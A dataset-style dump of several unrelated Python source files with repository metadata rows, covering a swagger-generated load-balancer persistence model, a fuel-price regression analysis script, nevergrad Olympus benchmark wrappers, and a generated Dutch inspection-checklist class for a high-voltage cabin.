class LbSourceIpPersistenceProfile(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purge': 'str',
'ha_persistence_mirroring_enabled': 'bool',
'timeout': 'int'
}
attribute_map = {
'purge': 'purge',
'ha_persistence_mirroring_enabled': 'ha_persistence_mirroring_enabled',
'timeout': 'timeout'
}
def __init__(self, purge='FULL', ha_persistence_mirroring_enabled=False, timeout=300): # noqa: E501
"""LbSourceIpPersistenceProfile - a model defined in Swagger""" # noqa: E501
self._purge = None
self._ha_persistence_mirroring_enabled = None
self._timeout = None
self.discriminator = None
if purge is not None:
self.purge = purge
if ha_persistence_mirroring_enabled is not None:
self.ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
if timeout is not None:
self.timeout = timeout
@property
def purge(self):
"""Gets the purge of this LbSourceIpPersistenceProfile. # noqa: E501
persistence purge setting # noqa: E501
:return: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: str
"""
return self._purge
@purge.setter
def purge(self, purge):
"""Sets the purge of this LbSourceIpPersistenceProfile.
persistence purge setting # noqa: E501
:param purge: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:type: str
"""
allowed_values = ["NO_PURGE", "FULL"] # noqa: E501
if purge not in allowed_values:
raise ValueError(
"Invalid value for `purge` ({0}), must be one of {1}" # noqa: E501
.format(purge, allowed_values)
)
self._purge = purge
@property
def ha_persistence_mirroring_enabled(self):
"""Gets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:return: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: bool
"""
return self._ha_persistence_mirroring_enabled
@ha_persistence_mirroring_enabled.setter
def ha_persistence_mirroring_enabled(self, ha_persistence_mirroring_enabled):
"""Sets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:param ha_persistence_mirroring_enabled: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:type: bool
"""
self._ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
@property
def timeout(self):
"""Gets the timeout of this LbSourceIpPersistenceProfile. # noqa: E501
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:return: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: int
"""
return self._timeout
@timeout.setter
def timeout(self, timeout):
"""Sets the timeout of this LbSourceIpPersistenceProfile.
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:param timeout: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:type: int
"""
if timeout is not None and timeout < 1: # noqa: E501
raise ValueError("Invalid value for `timeout`, must be a value greater than or equal to `1`") # noqa: E501
self._timeout = timeout
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LbSourceIpPersistenceProfile):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"tcraft@pivotal.io"
] | tcraft@pivotal.io |
2e9d6ec76fdcc93c8746e3531462d5bf552016ea | 1c0509a06cec726735048f00f63d2529f5e43ce6 | /code_gasoline_france/analysis/analysis_total_access/reaction_analysis/overview_reactions_ronan.py | a4370f2b3423402edfeb364a2abc89faf8a13f2c | [] | no_license | etiennecha/master_code | e99c62e93aa052a66d4cdd3f3e3aa25a3aec4880 | 48821f6c854a1c6aa05cf81b653b3b757212b6f8 | refs/heads/master | 2021-01-23T14:35:45.904595 | 2018-03-11T18:57:38 | 2018-03-11T18:57:38 | 16,312,906 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,747 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import add_to_path
from add_to_path import path_data
from generic_master_price import *
from generic_master_info import *
import matplotlib.pyplot as plt
import statsmodels.api as sm
import statsmodels.formula.api as smf
path_dir_built = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_scraped_2011_2014')
path_dir_built_csv = os.path.join(path_dir_built, u'data_csv')
path_dir_built_ta = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_total_access')
path_dir_built_ta_json = os.path.join(path_dir_built_ta, 'data_json')
path_dir_built_ta_csv = os.path.join(path_dir_built_ta, 'data_csv')
path_dir_built_ta_graphs = os.path.join(path_dir_built_ta, 'data_graphs')
pd.set_option('float_format', '{:,.3f}'.format)
format_float_int = lambda x: '{:10,.0f}'.format(x)
format_float_float = lambda x: '{:10,.3f}'.format(x)
# #########
# LOAD DATA
# #########
# DF STATION INFO
df_info = pd.read_csv(os.path.join(path_dir_built_csv,
'df_station_info_final.csv'),
encoding = 'utf-8',
dtype = {'id_station' : str,
'adr_zip' : str,
'adr_dpt' : str,
'ci_1' : str,
'ci_ardt_1' :str,
'ci_2' : str,
'ci_ardt_2' : str,
'dpt' : str},
parse_dates = [u'day_%s' %i for i in range(4)]) # fix
df_info.set_index('id_station', inplace = True)
df_info = df_info[df_info['highway'] != 1]
# DF COMP
dict_comp_dtype = {'id_ta_{:d}'.format(i) : str for i in range(23)}
dict_comp_dtype['id_station'] = str
df_comp = pd.read_csv(os.path.join(path_dir_built_csv,
'df_comp.csv'),
dtype = dict_comp_dtype,
encoding = 'utf-8')
df_comp.set_index('id_station', inplace = True)
# DF PRICES
df_prices_ht = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ht_final.csv'),
parse_dates = ['date'])
df_prices_ht.set_index('date', inplace = True)
df_prices_ttc = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ttc_final.csv'),
parse_dates = ['date'])
df_prices_ttc.set_index('date', inplace = True)
df_prices = df_prices_ttc
# CHOOSE DISTANCE
str_ta_ext = '_5km_dist_order'
# DF TOTAL ACCESS
df_ta = pd.read_csv(os.path.join(path_dir_built_ta_csv,
'df_total_access{:s}.csv'.format(str_ta_ext)),
dtype = {'id_station' : str,
'id_total_ta' : str,
'id_elf_ta' : str,
'ci_1' : str,
'ci_ardt_1' : str},
encoding = 'utf-8',
parse_dates = ['start', 'end',
'ta_date_beg',
'ta_date_end',
'date_min_total_ta',
'date_max_total_ta',
'date_min_elf_ta',
'date_max_elf_ta'])
df_ta.set_index('id_station', inplace = True)
# DF REG RES
df_res = pd.read_csv(os.path.join(path_dir_built_ta_csv,
'df_res_indiv{:s}.csv'.format(str_ta_ext)),
encoding = 'utf-8',
dtype = {'id_station' : str})
df_res.set_index('id_station', inplace = True)
# CHECK FOR DUPLICATES IN DF RES (AND DROP)
# one case: Total => Avia hence tta_comp and tta_tot (drop)
#import collections
#dict_cnt = dict(Counter(list(df_res.index)))
#print([k for k,v in cnt.items() if v != 1])
df_res = df_res[df_res.index != '4600001']
# ENRICH DF REG
df_res = pd.merge(df_res,
df_ta[['name',
'adr_street',
'adr_city',
'ci_1',
'ci_ardt_1',
'reg',
'dpt',
'group',
'brand_last',
'group_last',
'group_type_last',
'id_total_ta',
'dist_total_ta',
'date_min_total_ta',
'date_max_total_ta',
'id_elf_ta',
'dist_elf_ta',
'date_min_elf_ta',
'date_max_elf_ta',
'ta_date_beg',
'ta_date_end']],
left_index = True,
right_index = True,
how = 'left')
df_res['tr_id'] = None
df_res['tr_dist'] = None
#df_res['tr_date_min'] = pd.NaT
#df_res['tr_date_max'] = pd.NaT
df_res.rename(columns = {'ta_date_beg' : 'tr_date_min',
'ta_date_end' : 'tr_date_max'},
inplace = True)
# Consolidate the treatment-specific columns (station id, distance, date
# range of the treatment) into generic `tr_*` columns so that downstream
# code can use a single set of column names regardless of treatment type.
for str_treated in ['tta_comp', 'tta_tot']:
    # Total Access treatments: copy the "total_ta" columns.
    mask_treated = df_res['treated'] == str_treated
    df_res.loc[mask_treated, 'tr_id'] = df_res['id_total_ta']
    df_res.loc[mask_treated, 'tr_dist'] = df_res['dist_total_ta']
    df_res.loc[mask_treated, 'tr_date_min'] = df_res['date_min_total_ta']
    df_res.loc[mask_treated, 'tr_date_max'] = df_res['date_max_total_ta']
for str_treated in ['eta_comp']:
    # Esso treatments: copy the "elf_ta" columns.
    mask_treated = df_res['treated'] == str_treated
    df_res.loc[mask_treated, 'tr_id'] = df_res['id_elf_ta']
    df_res.loc[mask_treated, 'tr_dist'] = df_res['dist_elf_ta']
    df_res.loc[mask_treated, 'tr_date_min'] = df_res['date_min_elf_ta']
    df_res.loc[mask_treated, 'tr_date_max'] = df_res['date_max_elf_ta']
# The treatment-specific source columns are now redundant.
df_res.drop(['id_total_ta', 'dist_total_ta',
             'date_min_total_ta', 'date_max_total_ta',
             'id_elf_ta', 'dist_elf_ta',
             'date_min_elf_ta', 'date_max_elf_ta'],
            axis=1,
            inplace=True)

# DF RES RONAN: merge in Ronan's station-level estimates for comparison.
df_res_ronan = pd.read_csv(os.path.join(path_dir_built_ta_csv,
                                        'df_res_indiv_ronan.csv'),
                           encoding='utf-8',
                           dtype={'id_station': str})
df_res_ronan.set_index('id_station', inplace=True)
df_res = pd.merge(df_res,
                  df_res_ronan[['Price5', 'Price5reg', 'Price5Ind']],
                  left_index=True,
                  right_index=True,
                  how='left')

# Express our treatment effect in cents so it is on the same scale as
# Ronan's estimates (presumably already in cents -- TODO confirm).
df_res['c_treatment'] = df_res['c_treatment'] * 100
print(u"Inspect Ronan's estimates:")
print(df_res[(df_res['treated'] == 'tta_comp')]
      [['Price5', 'Price5reg', 'c_treatment', 'p_treatment']][0:10].to_string())

df_res['diff'] = df_res['c_treatment'] - df_res['Price5reg']
# BUG FIX: DataFrame.sort() was deprecated in pandas 0.17 and removed in
# 0.20; sort_values() is the supported equivalent with the same arguments.
df_res.sort_values('diff', ascending=False, inplace=True)
print()
print(u"Inspect extreme diffs:")
print(df_res[(df_res['treated'] == 'tta_comp')]
      [['Price5', 'Price5reg', 'c_treatment', 'p_treatment', 'diff']][0:10].to_string())
print(df_res[(df_res['treated'] == 'tta_comp')]
      [['Price5', 'Price5reg', 'c_treatment', 'p_treatment', 'diff']][-10:].to_string())

# diff by region: average gap between Ronan's two estimates, restricted to
# competitor treatments with a significant estimated effect (p <= 0.05).
print()
print(u"Inspect avg diff by region:")
for reg in df_res['reg'].unique():
    df_res_reg = df_res[(df_res['reg'] == reg) &
                        (df_res['treated'] == 'tta_comp') &
                        (df_res['p_treatment'] <= 0.05)]
    print(u"{:s} {:.2f}".format(reg, (df_res_reg['Price5Ind'] - df_res_reg['Price5reg']).mean()))
## ##########
## OVERVIEW
## ##########
#
## todo: graphs of reactions above 0.03 or 0.04 cents
## todo: check share supermarkets vs. oil/indep
## todo: check reaction vs. station fe (todo elsewhere)
## todo: check closest competitor(s) of total access systematically? (based on pair price stats)
#
## treatment value thresholds for display
#ls_val = [i/100.0 for i in range(1, 10)]
#
## cent display
#pd.set_option('float_format', '{:,.2f}'.format)
#df_res['c_treatment'] = df_res['c_treatment'] * 100
#ls_val = [i for i in range(1, 10)]
#
#ls_pctiles = [0.1, 0.25, 0.5, 0.75, 0.9]
#
#for str_treated in ['tta', 'tta_tot', 'tta_comp', 'eta', 'eta_comp']:
# str_treated = 'tta_comp'
# df_res_sub = df_res[df_res['treated'] == str_treated]
#
# print()
# print(u'Overview of regression results for {:s}'.format(str_treated))
# print(df_res_sub.describe(percentiles = ls_pctiles).to_string())
#
# # Inspect significant treatments
# df_res_sub_sig = df_res_sub[df_res_sub['p_treatment'] <= 0.05]
# print()
# print(u'Nb sig treatments:', len(df_res_sub_sig))
# print(u'Nb positive/negative reactions above threshold:')
#
# ls_nb_inc = [len(df_res_sub_sig[df_res_sub_sig['c_treatment'] >= val])\
# for val in ls_val]
# ls_nb_dec = [len(df_res_sub_sig[df_res_sub_sig['c_treatment'] <= -val])\
# for val in ls_val]
# df_su_sig_reacs = pd.DataFrame([ls_nb_inc, ls_nb_dec],
# columns = ls_val,
# index = ['Nb pos', 'Nb neg'])
# print(df_su_sig_reacs.to_string())
#
## treatment distributions by station type for tta_comp
#print()
#print(u'Overview of indiv effects by group type for tta_comp:')
#df_res_sub = df_res[df_res['treated'] == 'tta_comp']
#ls_se_gp_ies = []
#ls_temp_loop = [('Sup', df_res_sub[df_res_sub['group_type_last'] == 'SUP']),
# ('Esso Exp.', df_res_sub[df_res_sub['brand_last'] == 'ESSO_EXPRESS']),
# ('Esso', df_res_sub[df_res_sub['brand_last'] == 'ESSO']),
# ('NSup', df_res_sub[df_res_sub['group_type_last'] != 'SUP']),
# ('NSup NEExp',
# df_res_sub[(df_res_sub['group_type_last'] != 'SUP') &\
# (df_res_sub['brand_last'] != 'ESSO_EXPRESS')])]
#for str_temp, df_temp in ls_temp_loop:
# ls_se_gp_ies.append(df_temp['c_treatment'].describe())
#df_su_gp_ies = pd.concat(ls_se_gp_ies,
# axis = 1,
# keys = [x[0] for x in ls_temp_loop])
#print(df_su_gp_ies.to_string())
#
### ########
### GRAPHS
### ########
##
### Move?
##
### Graphs of competitors or group Total stations affected
##df_res_check = df_res[(df_res['treated'].isin(['tta_tot',
## 'tta_comp',
## 'eta_comp'])) &\
## (df_res['p_treatment'] <= 0.05) &\
## (df_res['c_treatment'].abs() >= 3)] # 0.04 if not using cent
##
##for id_station, row in df_res_check.iterrows():
## fig = plt.figure(figsize=(16,6))
## ax1 = fig.add_subplot(111)
## l2 = ax1.plot(df_prices_ttc.index, df_prices_ttc[row['tr_id']].values,
## c = 'b', label = 'Station {:s}'.format(df_info.ix[row['tr_id']]['brand_0']))
## l3 = ax1.plot(df_prices_ttc.index, df_prices_ttc.mean(1).values,
## c = 'r', label = 'Moyenne nationale')
## l1 = ax1.plot(df_prices_ttc.index, df_prices_ttc[id_station].values,
## c = 'g', label = 'Station {:s}'.format(df_info.ix[id_station]['brand_0']))
## lns = l1 + l2 + l3
## labs = [l.get_label() for l in lns]
## ax1.legend(lns, labs, loc=0)
## ax1.axvline(x = row['tr_date_min'], color = 'b', ls = '--', alpha = 1.0, lw = 1.5)
## ax1.axvline(x = row['tr_date_max'], color = 'b', ls = '--', alpha = 1.0, lw = 1.5)
## ax1.grid()
## plt.tight_layout()
## #plt.show()
## reac_sign = 'pos'
## if row['c_treatment'] < 0:
## reac_sign = 'neg'
## plt.savefig(os.path.join(path_dir_built_ta_graphs,
## 'price_series_treated',
## '{:s}_{:s}_{:.2f}_{:s}.png'.format(row['treated'],
## reac_sign,
## np.abs(row['c_treatment']),
## id_station)),
## dpi = 200,
## bbox_inches='tight')
## plt.close()
| [
"echamayou@gmail.com"
] | echamayou@gmail.com |
974266c40be29c89c2283e836d50a53fbe2b5395 | bee77315d08def61c1155930285211ef3d8d7654 | /nevergrad/functions/olympussurfaces/core.py | 978320088ddd141745feb7073f77e1a0df4ec471 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | facebookresearch/nevergrad | d2da592c1bf3b7c398392b3d39217a3753a4912c | daddb18184bf64ba9082ecc55a56e07429a23103 | refs/heads/main | 2023-09-04T10:53:42.903505 | 2023-08-30T17:10:37 | 2023-08-30T17:10:37 | 158,468,845 | 3,526 | 367 | MIT | 2023-09-11T13:37:36 | 2018-11-21T00:33:17 | Python | UTF-8 | Python | false | false | 4,355 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Based on https://github.com/aspuru-guzik-group/olympus
import numpy as np
from functools import partial
from nevergrad.parametrization import parameter as p
from ..base import ExperimentFunction
import nevergrad as ng
class OlympusSurface(ExperimentFunction):
    """Continuous benchmark surfaces from the Olympus suite, with optional noise.

    The surface is randomly shifted at construction time (``self.shift``) so
    that the optimum does not sit trivially at the origin.
    """

    # Supported Olympus surface names. NOTE: "Michalewicz" appears twice in
    # the original tuple; harmless for membership tests, kept for fidelity.
    SURFACE_KINDS = (
        "Michalewicz",
        "AckleyPath",
        "Dejong",
        "HyperEllipsoid",
        "Levy",
        "Michalewicz",
        "Rastrigin",
        "Rosenbrock",
        "Schwefel",
        "StyblinskiTang",
        "Zakharov",
        "DiscreteAckley",
        "DiscreteDoubleWell",
        "DiscreteMichalewicz",
        "LinearFunnel",
        "NarrowFunnel",
        "GaussianMixture",
    )

    def __init__(
        self, kind: str, dimension: int = 10, noise_kind: str = "GaussianNoise", noise_scale: float = 1
    ) -> None:
        self.kind = kind
        self.param_dim = dimension
        self.noise_kind = noise_kind
        assert self.kind in OlympusSurface.SURFACE_KINDS
        assert self.noise_kind in ["GaussianNoise", "UniformNoise", "GammaNoise"]
        self.noise_scale = noise_scale
        # Noisy objective used during optimization; noiseless variant for
        # the final evaluation.
        self.surface = partial(self._simulate_surface, noise=True)
        self.surface_without_noise = partial(self._simulate_surface, noise=False)
        parametrization = p.Array(shape=(dimension,))
        parametrization.function.deterministic = False
        super().__init__(self.surface, parametrization)
        # Random translation of the optimum, drawn from the parametrization's
        # random state for reproducibility.
        self.shift = self.parametrization.random_state.normal(size=self.dimension)

    def _simulate_surface(self, x: np.ndarray, noise: bool = True) -> float:
        """Evaluate the shifted surface at ``x``, optionally adding noise."""
        try:
            from olympus.surfaces import import_surface  # pylint: disable=import-outside-toplevel
            from olympus import noises
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e

        if noise:
            # Use a distinct name so the boolean `noise` parameter is not
            # shadowed by the noise-model object (as in the previous code).
            noise_model = noises.Noise(kind=self.noise_kind, scale=self.noise_scale)
            surface = import_surface(self.kind)(param_dim=self.param_dim, noise=noise_model)
        else:
            surface = import_surface(self.kind)(param_dim=self.param_dim)
        # The shift is applied here, in the single place where the surface
        # is evaluated.
        return surface.run(x - self.shift)[0][0]

    def evaluation_function(self, *recommendations) -> float:
        """Return the noise-free loss of the first recommendation.

        BUG FIX: ``_simulate_surface`` already subtracts ``self.shift``;
        the previous code passed ``x - self.shift`` here as well, so the
        point was shifted twice and the reported loss was not the loss of
        the recommended point.
        """
        x = recommendations[0].value
        return self.surface_without_noise(x)
class OlympusEmulator(ExperimentFunction):
    """Machine-learned emulators of real experimental datasets from Olympus."""

    # Datasets for which Olympus ships a trained emulator.
    DATASETS = (
        "suzuki",
        "fullerenes",
        "colors_bob",
        "photo_wf3",
        "snar",
        "alkox",
        "benzylation",
        "photo_pce10",
        "hplc",
        "colors_n9",
    )

    def __init__(self, dataset_kind: str = "alkox", model_kind: str = "NeuralNet") -> None:
        self.dataset_kind = dataset_kind
        self.model_kind = model_kind
        assert self.dataset_kind in OlympusEmulator.DATASETS
        assert self.model_kind in ["BayesNeuralNet", "NeuralNet"]
        search_space = self._get_parametrization()
        search_space.function.deterministic = False
        search_space.set_name("")
        super().__init__(self._simulate_emulator, search_space)

    def _get_parametrization(self) -> p.Parameter:
        """Build a bounded array parametrization matching the dataset's inputs."""
        try:
            from olympus.datasets import Dataset  # pylint: disable=import-outside-toplevel
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
        dataset = Dataset(self.dataset_kind)
        # Last column of the dataset is the target, the rest are inputs.
        dimension = dataset.shape[1] - 1
        lower_bounds, upper_bounds = zip(*dataset.param_space.param_bounds)
        return p.Array(shape=(dimension,), lower=lower_bounds, upper=upper_bounds)

    def _simulate_emulator(self, x: np.ndarray) -> float:
        """Run the emulator at ``x``; negate when the dataset's goal is maximization."""
        try:
            from olympus import Emulator  # pylint: disable=import-outside-toplevel
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
        emulator = Emulator(dataset=self.dataset_kind, model=self.model_kind)
        prediction = emulator.run(x)[0][0]
        if emulator.get_goal() == "maximize":
            return -prediction
        return prediction
| [
"noreply@github.com"
] | facebookresearch.noreply@github.com |
b7c40d61a3c77f55910703ef873c867fe577ab01 | 0e478f3d8b6c323c093455428c9094c45de13bac | /src/OTLMOW/OEFModel/Classes/HSCabineLegacy.py | b135fa0033f6f9bb78035d3c47a8967a43a5ba9a | [
"MIT"
] | permissive | davidvlaminck/OTLMOW | c6eae90b2cab8a741271002cde454427ca8b75ba | 48f8c357c475da1d2a1bc7820556843d4b37838d | refs/heads/main | 2023-01-12T05:08:40.442734 | 2023-01-10T15:26:39 | 2023-01-10T15:26:39 | 432,681,113 | 3 | 1 | MIT | 2022-06-20T20:36:00 | 2021-11-28T10:28:24 | Python | UTF-8 | Python | false | false | 21,778 | py | # coding=utf-8
from OTLMOW.OEFModel.EMObject import EMObject
from OTLMOW.OEFModel.EMAttribuut import EMAttribuut
from OTLMOW.OTLModel.Datatypes.StringField import StringField
# Generated with OEFClassCreator. To modify: extend, do not edit
class HSCabineLegacy(EMObject):
    """Sub-part of a high-voltage (HS) installation ('subonderdeel van HS-installatie').

    Machine-generated model class (see the OEFClassCreator note above):
    every attribute is a free-text inspection-checklist field wrapped in an
    EMAttribuut, exposed through a matching property pair.  Extend rather
    than edit.
    """
    # Canonical legacy URI of this object type in the AWV data model.
    typeURI = 'https://lgc.data.wegenenverkeer.be/ns/installatie#HSCabineLegacy'
    label = 'Hoogspanningscabine (Legacy)'

    def __init__(self):
        super().__init__()

        # Each private EMAttribuut below carries the Dutch field name/label,
        # its objectUri in the attribute namespace, and a placeholder
        # definition.  NOTE(review): two attributes
        # (geisoleerdeHandschInPerfecteStaat, kabelkelderVrijVanWater) use
        # the '#EMObject.' namespace instead of '#HSCabineLegacy.' --
        # presumably a generator quirk; confirm against the OEF model before
        # changing.
        self._alleMetalenOnderdelenGeaardVerbonden = EMAttribuut(field=StringField,
            naam='alle metalen onderdelen geaard&verbonden',
            label='alle metalen onderdelen geaard&verbonden',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleMetalenOnderdelenGeaardVerbonden',
            definitie='Definitie nog toe te voegen voor eigenschap alle metalen onderdelen geaard&verbonden',
            owner=self)

        self._alleToegangsdeurenSluitenPerfect = EMAttribuut(field=StringField,
            naam='alle toegangsdeuren sluiten perfect',
            label='alle toegangsdeuren sluiten perfect',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleToegangsdeurenSluitenPerfect',
            definitie='Definitie nog toe te voegen voor eigenschap alle toegangsdeuren sluiten perfect',
            owner=self)

        self._alleVerlichtingsarmaturenFunctioneren = EMAttribuut(field=StringField,
            naam='alle verlichtingsarmaturen functioneren',
            label='alle verlichtingsarmaturen functioneren',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.alleVerlichtingsarmaturenFunctioneren',
            definitie='Definitie nog toe te voegen voor eigenschap alle verlichtingsarmaturen functioneren',
            owner=self)

        self._bezoekkaartAanwezigEnIngevuld = EMAttribuut(field=StringField,
            naam='bezoekkaart aanwezig en ingevuld',
            label='bezoekkaart aanwezig en ingevuld',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.bezoekkaartAanwezigEnIngevuld',
            definitie='Definitie nog toe te voegen voor eigenschap bezoekkaart aanwezig en ingevuld',
            owner=self)

        self._binnenGeenSpinnenwebOngedierteZand = EMAttribuut(field=StringField,
            naam='binnen geen spinnenweb/ongedierte/zand',
            label='binnen geen spinnenweb/ongedierte/zand',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.binnenGeenSpinnenwebOngedierteZand',
            definitie='Definitie nog toe te voegen voor eigenschap binnen geen spinnenweb/ongedierte/zand',
            owner=self)

        self._geenScheurenOpeningenInBehuizing = EMAttribuut(field=StringField,
            naam='geen scheuren/openingen in behuizing',
            label='geen scheuren/openingen in behuizing',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenScheurenOpeningenInBehuizing',
            definitie='Definitie nog toe te voegen voor eigenschap geen scheuren/openingen in behuizing',
            owner=self)

        self._geenStootStruikelgevaar = EMAttribuut(field=StringField,
            naam='geen stoot / struikelgevaar',
            label='geen stoot / struikelgevaar',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenStootStruikelgevaar',
            definitie='Definitie nog toe te voegen voor eigenschap geen stoot / struikelgevaar',
            owner=self)

        self._geenVreemdeMaterialenAanwezig = EMAttribuut(field=StringField,
            naam='geen vreemde materialen aanwezig',
            label='geen vreemde materialen aanwezig',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.geenVreemdeMaterialenAanwezig',
            definitie='Definitie nog toe te voegen voor eigenschap geen vreemde materialen aanwezig',
            owner=self)

        # NOTE(review): objectUri uses the EMObject namespace here (see note above).
        self._geisoleerdeHandschInPerfecteStaat = EMAttribuut(field=StringField,
            naam='geisoleerde handsch in perfecte staat',
            label='geisoleerde handsch in perfecte staat',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#EMObject.geisoleerdeHandschInPerfecteStaat',
            definitie='Definitie nog toe te voegen voor eigenschap geisoleerde handsch in perfecte staat',
            owner=self)

        self._indicatieplatenAanwezigOpToegangsdeur = EMAttribuut(field=StringField,
            naam='indicatieplaten aanwezig op toegangsdeur',
            label='indicatieplaten aanwezig op toegangsdeur',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.indicatieplatenAanwezigOpToegangsdeur',
            definitie='Definitie nog toe te voegen voor eigenschap indicatieplaten aanwezig op toegangsdeur',
            owner=self)

        self._isolerendSasInGoedeStaat = EMAttribuut(field=StringField,
            naam='isolerend sas in goede staat',
            label='isolerend sas in goede staat',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.isolerendSasInGoedeStaat',
            definitie='Definitie nog toe te voegen voor eigenschap isolerend sas in goede staat',
            owner=self)

        # NOTE(review): objectUri uses the EMObject namespace here (see note above).
        self._kabelkelderVrijVanWater = EMAttribuut(field=StringField,
            naam='kabelkelder vrij van water',
            label='kabelkelder vrij van water',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#EMObject.kabelkelderVrijVanWater',
            definitie='Definitie nog toe te voegen voor eigenschap kabelkelder vrij van water',
            owner=self)

        self._noodverlichtingsarmaturenFunctioneren = EMAttribuut(field=StringField,
            naam='noodverlichtingsarmaturen functioneren',
            label='noodverlichtingsarmaturen functioneren',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.noodverlichtingsarmaturenFunctioneren',
            definitie='Definitie nog toe te voegen voor eigenschap noodverlichtingsarmaturen functioneren',
            owner=self)

        self._opmerkingenOverHsCabine = EMAttribuut(field=StringField,
            naam='opmerkingen over HS cabine',
            label='opmerkingen over HS cabine',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.opmerkingenOverHsCabine',
            definitie='Definitie nog toe te voegen voor eigenschap opmerkingen over HS cabine',
            owner=self)

        self._slotenEnScharnierenInGoedeStaat = EMAttribuut(field=StringField,
            naam='sloten en scharnieren in goede staat',
            label='sloten en scharnieren in goede staat',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.slotenEnScharnierenInGoedeStaat',
            definitie='Definitie nog toe te voegen voor eigenschap sloten en scharnieren in goede staat',
            owner=self)

        self._thermostaatHygrostaatFunctioneert = EMAttribuut(field=StringField,
            naam='thermostaat / hygrostaat functioneert',
            label='thermostaat / hygrostaat functioneert',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.thermostaatHygrostaatFunctioneert',
            definitie='Definitie nog toe te voegen voor eigenschap thermostaat / hygrostaat functioneert',
            owner=self)

        self._toegangVrijVanOnkruidStruikenTakken = EMAttribuut(field=StringField,
            naam='toegang vrij van onkruid/struiken/takken',
            label='toegang vrij van onkruid/struiken/takken',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.toegangVrijVanOnkruidStruikenTakken',
            definitie='Definitie nog toe te voegen voor eigenschap toegang vrij van onkruid/struiken/takken',
            owner=self)

        self._toegangspadInGoedeStaat = EMAttribuut(field=StringField,
            naam='toegangspad in goede staat',
            label='toegangspad in goede staat',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.toegangspadInGoedeStaat',
            definitie='Definitie nog toe te voegen voor eigenschap toegangspad in goede staat',
            owner=self)

        self._verluchtingsroostersInGoedeStaat = EMAttribuut(field=StringField,
            naam='verluchtingsroosters in goede staat',
            label='verluchtingsroosters in goede staat',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.verluchtingsroostersInGoedeStaat',
            definitie='Definitie nog toe te voegen voor eigenschap verluchtingsroosters in goede staat',
            owner=self)

        self._verwarmingstoestelNietAfgedekt = EMAttribuut(field=StringField,
            naam='verwarmingstoestel niet afgedekt',
            label='verwarmingstoestel niet afgedekt',
            objectUri='https://ins.data.wegenenverkeer.be/ns/attribuut#HSCabineLegacy.verwarmingstoestelNietAfgedekt',
            definitie='Definitie nog toe te voegen voor eigenschap verwarmingstoestel niet afgedekt',
            owner=self)

